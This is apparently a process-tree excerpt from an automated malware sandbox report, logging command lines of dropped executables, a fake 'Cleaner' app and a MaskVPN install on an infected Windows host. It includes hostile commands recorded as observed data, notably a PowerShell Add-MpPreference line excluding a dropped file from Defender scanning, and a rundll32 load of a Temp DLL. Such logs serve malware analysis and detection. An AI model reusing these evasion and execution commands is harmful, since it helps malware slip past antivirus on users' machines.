C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=3108 /prefetch:85⤵PID:3092
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3164 /prefetch:25⤵PID:1208
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=3600 /prefetch:85⤵PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=3448 /prefetch:85⤵PID:7360
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=2088 /prefetch:85⤵PID:7504
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1588,13057642860088552191,16069140220550230258,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3328_924842558" --mojo-platform-channel-handle=3216 /prefetch:85⤵PID:6508
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_94F.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:7824
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3252 -ip 32521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5548 -ip 55481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6240 -ip 62401⤵PID:4448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6296
-
C:\Users\Admin\AppData\Local\Temp\DD80.exeC:\Users\Admin\AppData\Local\Temp\DD80.exe1⤵PID:4548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1504 -ip 15041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3096 -ip 30961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1140 -ip 11401⤵PID:6340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5128 -ip 51281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4576 -ip 45761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5460
-
C:\Users\Admin\AppData\Local\Temp\2E50.exeC:\Users\Admin\AppData\Local\Temp\2E50.exe1⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\57A3.exeC:\Users\Admin\AppData\Local\Temp\57A3.exe1⤵PID:6896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 2962⤵
- Program crash
PID:7260
-
-
C:\Users\Admin\AppData\Local\Temp\609D.exeC:\Users\Admin\AppData\Local\Temp\609D.exe1⤵PID:4168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 2762⤵
- Program crash
PID:7984
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 656 -p 5204 -ip 52041⤵PID:4224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6896 -ip 68961⤵PID:7916
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7952 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8020 -s 4483⤵
- Program crash
PID:5400
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8020 -ip 80201⤵PID:4252
-
C:\Users\Admin\AppData\Local\Temp\89B2.exeC:\Users\Admin\AppData\Local\Temp\89B2.exe1⤵PID:7284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4168 -ip 41681⤵PID:7612
-
C:\Users\Admin\AppData\Local\Temp\B3A1.exeC:\Users\Admin\AppData\Local\Temp\B3A1.exe1⤵PID:5428
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 636 -p 7016 -ip 70161⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵PID:4168
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5d11efe4-4f02-604b-adf4-cd0146346139}\oemvista.inf" "9" "4d14a44ff" "0000000000000140" "WinSta0\Default" "000000000000015C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7664
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000160" "3fc1"2⤵PID:6248
-
-
C:\Users\Admin\AppData\Local\Temp\4B.exeC:\Users\Admin\AppData\Local\Temp\4B.exe1⤵PID:3816
-
C:\Users\Admin\AppData\Local\Temp\c828dce7-519e-4509-a67b-89bc6ad39312\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c828dce7-519e-4509-a67b-89bc6ad39312\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c828dce7-519e-4509-a67b-89bc6ad39312\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:7520
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c828dce7-519e-4509-a67b-89bc6ad39312\test.bat"3⤵PID:6476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\4B.exe" -Force2⤵PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\4B.exeC:\Users\Admin\AppData\Local\Temp\4B.exe2⤵PID:1928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2996 -ip 29961⤵PID:5400
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 8802⤵
- Program crash
PID:2716
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 8088 -ip 80881⤵PID:7648
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3420
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:7268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:7332
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1124
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1052
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4384 -ip 43841⤵PID:8012
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵PID:8020
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5908 -ip 59081⤵PID:7884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 6460 -ip 64601⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:6056
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6268
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6220 -ip 62201⤵PID:4472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1976 -ip 19761⤵PID:2260
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:884
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:1644
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:7348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\9C90.exeC:\Users\Admin\AppData\Local\Temp\9C90.exe1⤵PID:7540